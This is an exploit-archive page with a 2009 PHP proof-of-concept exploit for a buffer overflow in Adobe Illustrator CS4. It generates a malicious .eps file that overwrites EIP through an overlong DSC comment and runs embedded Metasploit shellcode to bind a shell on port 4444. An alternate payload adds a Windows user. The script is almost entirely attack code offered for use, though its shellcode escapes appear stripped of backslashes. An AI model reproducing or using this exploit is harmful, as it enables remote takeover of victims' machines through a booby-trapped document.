[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Adobe Illustrator CS4 v14.0.0 Encapsulated Postscript (.eps) Buffer Overflow Exploit
# Published : 2009-12-03
# Author : pyrokinesis
# Previous Title : Jasc Paint Shop Pro v8 Local Buffer Overflow Exploit (UNIVERSAL)
# Next Title : DAZ Studio Arbitrary Command Execution
<?php
/*
Adobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps)
overlong DSC Comment Buffer Overflow Exploit
by Nine:Situations:Group::pyrokinesis
site: http://retrogod.altervista.org/
An overlong string as DSC comment (more than 42000 bytes)
results in a direct EIP overwrite.
Exception is first-chance so the program will never crash.
At the moment of the redirection EAX and ESI are user-controlled.
This portion of the buffer begins with '%' (it is the next DSC
comment) but as you can see the resulting pattern is
nop-equivalent.
Tested and working against xp sp3
change the call esi if you need, must be alphabetic
I used a "call esi" from comctl32.dll on xp sp3,
change if needed.
Usage: php 9sg_illu.php
then double-click on the resulting 9sg.eps file
it will bind a shell on port 4444
change the shellcode for your needs even.
*/
# windows/adduser - 446 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, USER=adobe, PASS=kills
$_scode_i = "xdaxc9xd9x74x24xf4x59x49x49x49x49x49x49x49" .
"x49x49x49x43x43x43x43x43x43x43x37x51x5ax6a" .
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42" .
"x32x42x42x30x42x42x41x42x58x50x38x41x42x75" .
"x4ax49x4bx4cx4ax48x47x34x43x30x43x30x45x50" .
"x4cx4bx47x35x47x4cx4cx4bx43x4cx45x55x43x48" .
"x45x51x4ax4fx4cx4bx50x4fx44x58x4cx4bx51x4f" .
"x51x30x45x51x4ax4bx47x39x4cx4bx50x34x4cx4b" .
"x43x31x4ax4ex50x31x49x50x4ax39x4ex4cx4dx54" .
"x49x50x44x34x45x57x49x51x48x4ax44x4dx43x31" .
"x49x52x4ax4bx4ax54x47x4bx46x34x47x54x43x34" .
"x43x45x4ax45x4cx4bx51x4fx47x54x43x31x4ax4b" .
"x45x36x4cx4bx44x4cx50x4bx4cx4bx51x4fx45x4c" .
"x45x51x4ax4bx4cx4bx45x4cx4cx4bx43x31x4ax4b" .
"x4dx59x51x4cx47x54x44x44x48x43x51x4fx50x31" .
"x4bx46x43x50x46x36x45x34x4cx4bx47x36x50x30" .
"x4cx4bx47x30x44x4cx4cx4bx42x50x45x4cx4ex4d" .
"x4cx4bx42x48x43x38x4bx39x4ax58x4cx43x49x50" .
"x42x4ax46x30x42x48x4cx30x4dx5ax44x44x51x4f" .
"x45x38x4dx48x4bx4ex4cx4ax44x4ex51x47x4bx4f" .
"x4dx37x42x43x42x4dx42x44x46x4ex45x35x43x48" .
"x42x45x51x30x46x4fx45x33x47x50x42x4ex42x45" .
"x42x54x51x30x43x45x43x43x45x35x43x42x51x30" .
"x45x31x45x34x42x4fx42x42x43x55x47x50x42x4b" .
"x45x39x42x4cx42x4cx42x53x51x30x46x4fx51x51" .
"x47x34x50x44x51x30x47x56x51x36x51x30x42x4e" .
"x42x45x44x34x47x50x42x4cx42x4fx42x43x45x31" .
"x42x4cx43x57x43x42x42x4fx44x35x44x30x47x50" .
"x47x31x42x44x42x4dx42x49x42x4ex45x39x42x53" .
"x43x44x42x52x45x31x43x44x42x4fx44x32x44x33" .
"x51x30x45x31x45x34x42x4fx43x52x42x45x47x50" .
"x46x4fx47x31x47x34x51x54x45x50x41x41";
# windows/shell_bind_tcp - 696 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=
$_scode_ii = "x89xe5xdaxd0xd9x75xf4x5ex56x59x49x49x49x49" .
"x49x49x49x49x49x49x43x43x43x43x43x43x37x51" .
"x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32" .
"x41x42x32x42x42x30x42x42x41x42x58x50x38x41" .
"x42x75x4ax49x4bx4cx43x5ax4ax4bx50x4dx4dx38" .
"x4bx49x4bx4fx4bx4fx4bx4fx45x30x4cx4bx42x4c" .
"x46x44x51x34x4cx4bx47x35x47x4cx4cx4bx43x4c" .
"x43x35x43x48x43x31x4ax4fx4cx4bx50x4fx42x38" .
"x4cx4bx51x4fx47x50x43x31x4ax4bx51x59x4cx4b" .
"x46x54x4cx4bx43x31x4ax4ex50x31x49x50x4ax39" .
"x4ex4cx4dx54x49x50x43x44x45x57x49x51x49x5a" .
"x44x4dx43x31x49x52x4ax4bx4cx34x47x4bx50x54" .
"x51x34x46x48x43x45x4bx55x4cx4bx51x4fx47x54" .
"x45x51x4ax4bx42x46x4cx4bx44x4cx50x4bx4cx4b" .
"x51x4fx45x4cx43x31x4ax4bx45x53x46x4cx4cx4b" .
"x4bx39x42x4cx47x54x45x4cx45x31x48x43x46x51" .
"x49x4bx45x34x4cx4bx50x43x50x30x4cx4bx51x50" .
"x44x4cx4cx4bx44x30x45x4cx4ex4dx4cx4bx51x50" .
"x43x38x51x4ex45x38x4cx4ex50x4ex44x4ex4ax4c" .
"x50x50x4bx4fx48x56x45x36x50x53x43x56x45x38" .
"x50x33x46x52x45x38x44x37x43x43x47x42x51x4f" .
"x51x44x4bx4fx4ex30x45x38x48x4bx4ax4dx4bx4c" .
"x47x4bx50x50x4bx4fx49x46x51x4fx4cx49x4ax45" .
"x45x36x4bx31x4ax4dx43x38x43x32x51x45x42x4a" .
"x45x52x4bx4fx48x50x45x38x4ex39x44x49x4bx45" .
"x4ex4dx46x37x4bx4fx48x56x50x53x46x33x51x43" .
"x51x43x46x33x51x53x46x33x51x53x46x33x4bx4f" .
"x4ex30x45x36x45x38x42x31x51x4cx45x36x46x33" .
"x4bx39x4dx31x4ax35x42x48x4ex44x44x5ax42x50" .
"x49x57x51x47x4bx4fx49x46x43x5ax44x50x50x51" .
"x51x45x4bx4fx48x50x42x48x49x34x4ex4dx46x4e" .
"x4dx39x51x47x4bx4fx48x56x51x43x51x45x4bx4f" .
"x48x50x42x48x4dx35x51x59x4bx36x51x59x50x57" .
"x4bx4fx4ex36x46x30x50x54x46x34x51x45x4bx4f" .
"x4ex30x4cx53x45x38x4dx37x43x49x48x46x44x39" .
"x50x57x4bx4fx4ex36x46x35x4bx4fx4ex30x43x56" .
"x42x4ax43x54x42x46x43x58x45x33x42x4dx4dx59" .
"x4dx35x43x5ax46x30x51x49x47x59x48x4cx4bx39" .
"x4dx37x43x5ax50x44x4dx59x4bx52x50x31x49x50" .
"x4cx33x4ex4ax4bx4ex47x32x46x4dx4bx4ex47x32" .
"x46x4cx4cx53x4cx4dx43x4ax46x58x4ex4bx4ex4b" .
"x4ex4bx43x58x42x52x4bx4ex48x33x44x56x4bx4f" .
"x44x35x47x34x4bx4fx48x56x51x4bx51x47x46x32" .
"x46x31x50x51x50x51x42x4ax45x51x50x51x50x51" .
"x51x45x50x51x4bx4fx4ex30x42x48x4ex4dx49x49" .
"x43x35x48x4ex51x43x4bx4fx49x46x43x5ax4bx4f" .
"x4bx4fx50x37x4bx4fx4ex30x4cx4bx46x37x4bx4c" .
"x4dx53x48x44x45x34x4bx4fx4ex36x50x52x4bx4f" .
"x4ex30x42x48x4ax50x4dx5ax44x44x51x4fx50x53" .
"x4bx4fx4ex36x4bx4fx48x50x41x41";
$_eip = "x57x6bx41x77"; //0x77416b57 alphabetic call esi, comctl32.dll
$_boom = "xc5xd0xd3xc6x20x00x00x00x05xc8x04x00x00x00".
"x00x00x00x00x00x00%xc8x04x00xb5Ix01x00xff".
"xffx00x00".
"%!PS-Adobe-3.1x20EPSF-3.0rn".
"%ADO_DSC_Encoding:x20Windowsx20Romanrn".
"%".
str_repeat("A", 41699).
$_eip.
str_repeat("A", 2291).
"%Title:x20Untitled-1.epsrn".
"%AAAAAAAA". // we jump here, nop-equivalent
$_scode_ii.
": Arn".
"%%For:x20aliasrn".
"%%CreationDate:x2011/27/2009rn".
"%%BoundingBox:x200x200x20227x20171rn".
"%%HiResBoundingBox:x200x200x20226.5044x20170.3165rn".
"%%CropBox:x200x200x20226.5044x20170.3165rn".
"%%LanguageLevel:x202rn".
"%%DocumentData:x20Clean7Bitrn".
"%ADOBeginClientInjection:x20DocumentHeaderx20"AI11EPS"rn".
"%%AI8_CreatorVersion:x2014.0.0r".
"%AI9_PrintingDataBeginr".
"%ADO_BuildNumber:x20Adobex20Illustrator(R)x2014.0.0x20x367x20Rx20agmx204.4890x20ctx205.1541r".
"%ADO_ContainsXMP:x20MainFirstr".
"%AI7_Thumbnail:x20128x2096x208r".
"%%BeginData:x204096x20Hexx20Bytesr".
"%0000330000660000990000CC0033000033330033660033990033CC0033FFrn";
file_put_contents("9sg.eps", $_boom);
?>